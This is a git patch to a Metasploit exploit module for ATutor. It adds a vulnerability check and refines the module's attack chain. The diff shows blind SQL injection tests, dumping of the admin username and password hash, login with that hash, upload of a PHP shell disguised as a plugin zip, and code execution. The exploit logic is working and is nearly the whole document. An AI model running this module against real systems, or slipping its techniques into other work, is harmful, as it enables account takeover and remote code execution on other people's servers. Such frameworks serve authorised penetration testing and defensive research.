From f55835cceb26e89a3e603b09e3af35f0ffa13dd7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 29 Feb 2016 18:39:52 -0600 Subject: [PATCH] Merge new code changes from mr_me --- modules/exploits/multi/http/atutor_sqli.rb | 70 +++++++++++++--------- 1 file changed, 43 insertions(+), 27 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index f3fc1f5216..f9b7f6fbd4 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -63,6 +63,22 @@ class Metasploit3 < Msf::Exploit::Remote super("#{peer} - #{msg}") end + def check + # the only way to test if the target is vuln + begin + test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + if test_injection(test_cookie) + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + def push uri = normalize_uri(target_uri.path) @@ -115,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_shell(cookie) post_data = Rex::MIME::Message.new post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"") - post_data.add_part('Install', nil, nil, "form-data; name=\"install_upload\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"") data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), @@ -145,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote end # auth failed if we land here, bail - fail_with(Failure::NoAccess, "Upload did not work") + fail_with(Failure::Unknown, "Unable to upload php code") return false end @@ -275,19 +291,19 @@ class Metasploit3 < Msf::Exploit::Remote def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) if do_test - if do_true - result = perform_request("1=1", cookie) - if result =~ /There are \d entries./ - return true - end - else not do_true - result = perform_request("1=2", cookie) - if not result =~ /There are \d entries./ - return true - end - end - else not do_test and sql - return get_ascii_value(sql, cookie) + if do_true + result = perform_request("1=1", cookie) + if result =~ /There are \d entries./ + return true + end + else not do_true + result = perform_request("1=2", cookie) + if not result =~ /There are \d entries./ + return true + end + end + elsif not do_test and sql + return get_ascii_value(sql, cookie) end end @@ -332,18 +348,18 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) - if test_injection(student_cookie) - print_good("Test injection working!") - print_status("Dumping username and password hash...") - credz = dump_the_hash(student_cookie) - print_good("Got the #{credz[0]} hash: #{credz[1]} !") - if credz - admin_cookie = login(credz[0], credz[1], true) - print_status("Logged in as #{credz[0]}, uploading shell...") - if upload_shell(admin_cookie) - print_good("Shell upload successful!") - exec_code - end + print_status("Dumping username and password hash...") + # we got admin hash now + credz = dump_the_hash(student_cookie) + print_good("Got the #{credz[0]} hash: #{credz[1]} !") + if credz + admin_cookie = login(credz[0], credz[1], true) + print_status("Logged in as #{credz[0]}, uploading shell...") + # install a plugin + if upload_shell(admin_cookie) + print_good("Shell upload successful!") + # boom + exec_code end end end